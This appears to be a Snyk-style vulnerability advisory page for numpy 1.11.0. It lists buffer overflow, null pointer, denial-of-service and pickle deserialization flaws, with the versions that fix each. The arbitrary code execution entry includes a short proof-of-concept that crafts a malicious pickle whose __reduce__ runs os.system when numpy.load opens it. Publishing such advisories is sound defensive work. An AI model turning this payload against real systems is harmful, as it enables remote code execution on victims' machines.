numpy@1.11.0 vulnerabilities

Fundamental package for array computing in Python

Direct Vulnerabilities

Known vulnerabilities in the numpy package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • L
Buffer Overflow

numpy is a fundamental package needed for scientific computing with Python.

Affected versions of this package are vulnerable to Buffer Overflow in the PyArray_NewFromDescr_int function of ctors.c when specifying arrays of large dimensions (over 32) from Python code.

How to fix Buffer Overflow?

Upgrade numpy to version 1.21.0rc1 or higher.

[,1.21.0rc1)
  • L
Buffer Overflow

numpy is a fundamental package needed for scientific computing with Python.

Affected versions of this package are vulnerable to Buffer Overflow due to missing boundary checks in the array_from_pyobj function of fortranobject.c. This may allow an attacker to conduct Denial of Service by carefully constructing an array with negative values.

How to fix Buffer Overflow?

Upgrade numpy to version 1.22.0 or higher.

[,1.22.0)
  • L
NULL Pointer Dereference

numpy is a fundamental package needed for scientific computing with Python.

Affected versions of this package are vulnerable to NULL Pointer Dereference due to missing return-value validation in the PyArray_DescrNew function, which may allow attackers to conduct Denial of Service attacks by repetitively creating and sort arrays.

Note: This may likely only happen if application memory is already exhausted, as it requires the newdescr object of the PyArray_DescrNew to evaluate to NULL.

How to fix NULL Pointer Dereference?

Upgrade numpy to version 1.22.2 or higher.

[0,1.22.2)
  • L
Denial of Service (DoS)

numpy is a fundamental package needed for scientific computing with Python.

Affected versions of this package are vulnerable to Denial of Service (DoS) due to an incomplete string comparison in the numpy.core component, which may allow attackers to fail the APIs via constructing specific string objects.

How to fix Denial of Service (DoS)?

Upgrade numpy to version 1.22.0rc1 or higher.

[,1.22.0rc1)
  • C
Arbitrary Code Execution

numpy is a fundamental package needed for scientific computing with Python.

Affected versions of this package are vulnerable to Arbitrary Code Execution. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call.

PoC by nanshihui:

import numpy
from numpy import __version__
print __version__
import os
import  pickle
class Test(object):
    def __init__(self):
        self.a = 1

    def __reduce__(self):
        return (os.system,('ls',))
tmpdaa = Test()
with open("a-file.pickle",'wb') as f:
    pickle.dump(tmpdaa,f)
numpy.load('a-file.pickle')

How to fix Arbitrary Code Execution?

Upgrade numpy to version 1.16.3 or higher.

[0,1.16.3)
  • H
Denial of Service (DoS)

numpy is a package for scientific computing with Python.

Affected versions of this package are vulnerable to Denial of Service (DoS)due to missing input validation. An empty list or an array will stick into an infinite loop.

How to fix Denial of Service (DoS)?

Upgrade numpy to version 1.13.3 or higher.

[,1.13.3)